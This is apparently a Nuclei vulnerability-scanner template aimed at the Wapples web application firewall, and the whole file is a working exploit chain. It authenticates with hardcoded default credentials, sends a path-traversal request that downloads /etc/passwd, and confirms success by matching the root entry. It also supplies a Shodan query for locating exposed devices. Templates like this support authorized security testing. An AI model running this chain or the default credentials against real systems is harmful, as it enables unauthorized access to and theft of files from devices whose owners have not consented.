40 lines
978 B
YAML
40 lines
978 B
YAML
id: wapples-firewall-lfi
|
|
|
|
info:
|
|
name: Wapples Web Application Firewall - Arbitrary File Download
|
|
author: For3stCo1d
|
|
severity: high
|
|
reference:
|
|
- https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb
|
|
metadata:
|
|
verified: true
|
|
shodan-query: http.title:"Intelligent WAPPLES"
|
|
tags: wapples,firewall,lfi,authenticated
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /webapi/auth HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
id={{username}}&password={{password}}
|
|
|
|
- |
|
|
GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
attack: pitchfork
|
|
payloads:
|
|
username:
|
|
- systemi
|
|
password:
|
|
- db/wp.no1
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|